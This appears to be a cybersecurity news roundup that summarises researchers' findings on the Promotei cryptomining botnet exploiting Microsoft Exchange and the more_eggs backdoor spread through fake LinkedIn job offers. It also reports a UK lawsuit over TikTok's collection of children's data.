Security researchers uncovered two major malware strains in April: the more_eggs backdoor targeting LinkedIn users and the Promotei botnet's exploitation of the Microsoft Exchange vulnerabilities. Social media app TikTok is also under scrutiny for the misuse of children's information and data collection. This month's cybersecurity roundup takes a deep dive into the security concerns plaguing these social media platforms and corporate infrastructures alike.
Cryptocurrency miner further exploits Microsoft Exchange vulnerabilities
A cryptocurrency botnet named Promotei has recently been addressed by Cybereason's Nocturnus Team as a response to infections preying on Microsoft Exchange vulnerabilities discovered in March. The organization notes that this malware indiscriminately sprays for a wide range of victims from a variety of industries. This malware also appears to be continually updating with new modules and tooling, with its original version dating back to 2016.
The Exchange vulnerabilities act as a vector point for the China Chopper web shell. The web shell triggers a PowerShell script that delivers the payload, initializing the infection of several malicious executable files. Some of the files that work in tandem to create powerful, yet inconspicuous issues include:
|
File Name |
Description |
|
Sqhost.exe |
Supports a slew of commands for saving and executing files, as well as sets C&C servers. Includes a “-watchdog” parameter to keep itself running. |
|
Exchdefender.exe |
Feigns Microsoft labeling to stealthily fend off competing malware on a network. |
|
SearchIndexer.exe |
An open-source XMRig cryptominer. |
|
Rdclip.exe |
Acts as a backbone of credential harvesting and infection spread functions. |
|
Nethelper2.exe and Nethelper4.exe |
Connects SQL servers to infect with Sqhost.exe. |
|
Windlver.exe |
Assists with lateral spread across a network via SSH. |
The botnet also appears to utilize advanced persistent threat techniques to maintain its position on the network. One of its unique features enables it to set four different command and control servers. According to Assaf Dahan, head of threat research at Cybereason, it's more than merely stealing precious processing power from systems to mine cryptocurrency; these exploits could also act to exfiltrate information and even grant access to be sold to ransomware gangs.
For more information on this particular strain of malware, see Cybereason's full report on their findings.
Sophisticated spear phishing attempts target LinkedIn users
With heightened levels of unemployment, the Malware as a Service (MaaS) organization known as Golden Eggs preys on business professionals on LinkedIn with the more_eggs backdoor. The service takes a victim's current position displayed on LinkedIn to indicate how to most convincingly title a malicious file which poses as a false job offer. For example, a Product Manager would receive a "Product Manager position.zip" file. Although this is not the first time more_eggs has been utilized, researchers at eSentire's Threat Response Unit— who discovered the activity— outline the steps of more_egg's current dangers:
- Triggers Windows Management Instrumentation to enable a plugin loader
- Plugin loader hijacks Windows processes cmstp & regvr32
- Installs msxsl and loads a .oxc file from AWS as payload
- Payload signals command and control server that victim is available for exploit
- Golden Eggs' customer implements malware of choice
Researchers have stated that the motivations behind these attacks are unclear, but some suspect the MaaS customers are seeking intel on corporate networks in victim's futures. However, Golden Eggs' most notable customers, including FIN6, Evilnium, and The Cobalt Group, have traditionally targeted technology and finance companies.
A list of indicators and further details about more_eggs can be found in eSentire's research.
TikTok to face lawsuit for misusing information of minors
Social media giant TikTok finds itself the center of more controversy, this time under investigation for the suspected mishandling of children's biometric information, location data, videos, and phone numbers. After being fined $5.7 million in 2019 by the US Federal Trade Commission for illegally harvesting information on children aged 13 and under, the company finds itself under a new lawsuit initialized by the children's commissioner of England, Anne Longfield.
The United Kingdom's Data Protection Act 2018 establishes the digital age of consent to information society services at 13 years old. Information collected from children under 13 is considered illegal. Considering 44% of children age 8-12 in the UK are TikTok users and over 16 million TikTok users were found to be 14 or younger in 2020, the influence of the app is far-reaching. Longfield's claim argues that TikTok has been "deliberately opaque about the extent of personal information it collects," particularly the information sold to third parties used to generate ad revenue. When confronted, TikTok responded with the following:
Privacy and safety are top priorities for TikTok and we have robust policies, processes and technologies in place to help protect all users, and our teenage users in particular. We believe the claims lack merit and intend to vigorously defend the action.
While the future of Tik Tok’s data privacy policies remain unclear, concerned parents are already starting to take digital parenting into their own hands. Many families have turned to apps to equip their smart homes with parental controls and monitoring, which allow for real-time network visibility as well as web content filtering. For more information on a safe, secure, and happy online home in 2021, check out the Family Online Safety Institute’s webinar on digital parenting.
